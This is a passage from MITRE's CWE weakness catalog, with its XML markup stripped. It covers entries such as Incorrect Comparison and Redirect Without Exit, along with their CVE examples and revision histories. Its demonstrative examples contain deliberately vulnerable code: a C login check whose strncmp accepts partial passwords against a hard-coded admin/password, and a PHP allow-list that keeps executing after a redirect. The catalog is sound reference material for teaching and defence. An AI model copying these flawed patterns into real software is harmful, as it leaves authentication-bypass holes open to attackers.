to be called with higher privileges than intended + https://www.cve.org/CVERecord?id=CVE-2007-1588 + + + + + POS36-C + Observe correct revocation order while relinquishing privileges + CWE More Abstract + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Observed_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses. + + This Pillar covers several possibilities: + + the comparison checks one factor incorrectly; + the comparison should consider multiple factors, but it does not check at least one of those factors at all; + the comparison checks the wrong factor. + + + + + Primary + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year. + + public class Truck { + private String make;private String model;private int year; + public boolean equals(Object o) { + if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false; + Truck t = (Truck) o; + return (this.make.equals(t.getMake()) && this.model.equals(t.getModel())); + } + } + + Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included. + + + This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. + + + /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ + + char *username = "admin";char *pass = "password"; + int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} + int main (int argc, char **argv) { + int authResult;if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");}} + + In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. + As a result, this partial comparison leads to improper authentication (CWE-287). + Any of these passwords would still cause authentication to succeed for the "admin" user: + + ppapaspass + + This significantly reduces the search space for an attacker, making brute force attacks more feasible. + The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. + While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. + + + + + CVE-2021-3116 + Chain: Python-based HTTP Proxy server uses the wrong boolean operators (CWE-480) causing an incorrect comparison (CWE-697) that identifies an authN failure if all three conditions are met instead of only one, allowing bypass of the proxy authentication (CWE-1390) + https://www.cve.org/CVERecord?id=CVE-2021-3116 + + + CVE-2020-15811 + Chain: Proxy uses a substring search instead of parsing the Transfer-Encoding header (CWE-697), allowing request splitting (CWE-113) and cache poisoning + https://www.cve.org/CVERecord?id=CVE-2020-15811 + + + CVE-2016-10003 + Proxy performs incorrect comparison of request headers, leading to infoleak + https://www.cve.org/CVERecord?id=CVE-2016-10003 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. However, sometimes this weakness is forced to be used due to the lack of in-depth weakness research. See Research Gaps. + Where feasible, consider children or descendants of this entry instead. + + + + + + + Weaknesses related to this Pillar appear to be under-studied, especially with respect to classification schemes. Input from academic and other communities could help identify and resolve gaps or organizational difficulties within CWE. + + + This entry likely has some relationships with case sensitivity (CWE-178), but case sensitivity is a factor in other types of weaknesses besides comparison. Also, in cryptography, certain attacks are possible when certain comparison operations do not take place in constant time, causing a timing-related information leak (CWE-208). + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Research_Gaps + + Insufficient Comparison + + + + The web application sends a redirect to another location, but instead of exiting, it executes additional code. + + + + + + + Primary + + + + + Redirect Without Exit + + + + + Implementation + + + + + Other + Confidentiality + Integrity + Availability + Alter Execution Logic + Execute Unauthorized Code or Commands + This weakness could affect the control flow of the application and allow execution of untrusted code. + + + + + Black Box + This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss. + + + + + This code queries a server and displays its status when a request comes from an authorized IP address. + + $requestingIP = $_SERVER['REMOTE_ADDR'];if(!in_array($requestingIP,$ipAllowList)){echo "You are not authorized to view this page";http_redirect($errorPageURL);}$status = getServerStatus();echo $status; + ... + + + + This code redirects unauthorized users, but continues to execute code after calling http_redirect(). This means even unauthorized users may be able to access the contents of the page or perform a DoS attack on the server being queried. Also, note that this code is vulnerable to an IP address spoofing attack (CWE-212). + + + + + CVE-2013-1402 + Execution-after-redirect allows access to application configuration details. + https://www.cve.org/CVERecord?id=CVE-2013-1402 + + + CVE-2009-1936 + chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. + https://www.cve.org/CVERecord?id=CVE-2009-1936 + + + CVE-2007-2713 + Remote attackers can obtain access to administrator functionality through EAR. + https://www.cve.org/CVERecord?id=CVE-2007-2713 + + + CVE-2007-4932 + Remote attackers can obtain access to administrator functionality through EAR. + https://www.cve.org/CVERecord?id=CVE-2007-4932 + + + CVE-2007-5578 + Bypass of authentication step through EAR. + https://www.cve.org/CVERecord?id=CVE-2007-5578 + + + CVE-2007-2713 + Chain: Execution after redirect triggers eval injection. + https://www.cve.org/CVERecord?id=CVE-2007-2713 + + + CVE-2007-6652 + chain: execution after redirect allows non-administrator to perform static code injection. + https://www.cve.org/CVERecord?id=CVE-2007-6652 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Name, Observed_Examples, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Redirect Without Exit + + + + The default error page of a web application should not display sensitive information about the product. + + A Web application must define a default error page for 4xx errors (e.g. 404), 5xx (e.g. 500) errors and catch java.lang.Throwable exceptions to prevent attackers from mining information from the application container's built-in error response. + When an attacker explores a web site looking for vulnerabilities, the amount of information that the site provides is crucial to the eventual success or failure of any attempted attacks. + + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + A stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components. + + + + + Implementation + Handle exceptions appropriately in source code. + + + Implementation + System Configuration + Always define appropriate error pages. The application configuration should specify a default error page in order to guarantee that the application will never leak error messages to an attacker. Handling standard HTTP error codes is useful and user-friendly in addition to being a good security practice, and a good configuration will also define a last-chance error handler that catches any exception that could possibly be thrown by the application. + + + Implementation + Do not attempt to process an error or attempt to mask it. + + + Implementation + Verify return values are correct and do not supply sensitive information about the system. + + + + + In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things). + + Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());}} + + + + + + J2EE Misconfiguration: Missing Error Handling + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Misconfiguration: Missing Error Handling + + + + The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product. + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Availability + Integrity + Read Application Data + DoS: Crash, Exit, or Restart + Unexpected State + + + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fault Injection - source code + Fault Injection - binary + + Cost effective for partial coverage: + + Forced Path Execution + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + High + + + + + ERR06-J + Do not throw undeclared checked exceptions + + + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. + Consider children or descendants of this entry instead. + + + + + + This is a high-level class that might have some overlap with other classes. It could be argued that even "normal" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000). + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Name, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Failure to Handle Exceptional Conditions + + + + The product does not correctly convert an object, resource, or structure from one type to a different type. + + + + + + + + + + + Implementation + + + + + Other + Other + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + EXP05-C + Do not cast away a const qualification + + + EXP39-C + Do not access a variable through a pointer of an incompatible type + CWE More Abstract + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + CWE More Abstract + + + INT36-C + Converting a pointer to integer or integer to pointer + CWE More Abstract + + + STR34-C + Cast characters to unsigned types before converting to larger integer sizes + CWE More Abstract + + + STR37-C + Arguments to character handling functions must be representable as an unsigned char + CWE More Abstract + + + SFP1 + Glitch in computation + + + ASCRM-CWE-704 + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly return control flow to the proper location after it has completed a task or detected an unusual condition. + + + + + + + + + Implementation + + + + + Other + Alter Execution Logic + Other + + + + + CVE-2014-1266 + chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + + + ENV32-C + All exit handlers must return normally + CWE More Abstract + + + ERR04-C + Choose an appropriate termination strategy + + + THI05-J + Do not use Thread.stop() to terminate threads + + + ERR04-J + Do not complete abruptly from a finally block + + + ERR05-J + Do not let checked exceptions escape from a finally block + + + EXP31-PL + Do not suppress or ignore exceptions + Imprecise + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component. + + If a message is malformed, it may cause the message to be incorrectly interpreted. + Neutralization is an abstract term for any technique that ensures that input (and output) conforms with expectations and is "safe." This can be done by: + + checking that the input/output is already "safe" (e.g. validation) + transformation of the input/output to be "safe" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization + preventing the input/output from being directly provided by an attacker (e.g. "indirect selection" that maps externally-provided values to internally-controlled values) + preventing the input/output from being processed at all + + This weakness typically applies in cases where the product prepares a control message that another process must act on, such as a command or query, and malicious input that was intended as data, can enter the control plane instead. However, this weakness also applies to more general cases where there are not always control implications. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Other + + + + + + + + + + + + + + + + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. + Consider children or descendants of this entry instead. + + + + + + Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document. + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Enforce that Messages or Data are Well-Formed + Improper Enforcement of Message or Data Structure + + + + The product assigns an owner to a resource, but the owner is outside of the intended control sphere. + This may allow the resource to be manipulated by actors outside of the intended control sphere. + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + An attacker could read and modify data for which they do not have permissions to access directly. + + + + + Policy + Periodically review the privileges and their owners. + + + Testing + Use automated tools to check for privilege settings. + + + + + CVE-2007-5101 + File system sets wrong ownership and group when creating a new file. + https://www.cve.org/CVERecord?id=CVE-2007-5101 + + + CVE-2007-4238 + OS installs program with bin owner/group, allowing modification. + https://www.cve.org/CVERecord?id=CVE-2007-4238 + + + CVE-2007-1716 + Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation. + https://www.cve.org/CVERecord?id=CVE-2007-1716 + + + CVE-2005-3148 + Backup software restores symbolic links with incorrect uid/gid. + https://www.cve.org/CVERecord?id=CVE-2005-3148 + + + CVE-2005-1064 + Product changes the ownership of files that a symlink points to, instead of the symlink itself. + https://www.cve.org/CVERecord?id=CVE-2005-1064 + + + CVE-2011-1551 + Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations. + https://www.cve.org/CVERecord?id=CVE-2011-1551 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This overlaps verification errors, permissions, and privileges. + A closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry. + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated as it represents a specific observed example of a UNIX Hard Link weakness type rather than its own individual weakness type. Please refer to CWE-62. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Observed_Examples, Relationships, Research_Gaps, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Apple '.DS_Store' + + + + The product does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities. + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Other + + + + + Implementation + Document and closely follow coding standards. + + + Testing + Implementation + Where possible, use automated tools to enforce the standards. + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. + Consider children or descendants of this entry instead. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + 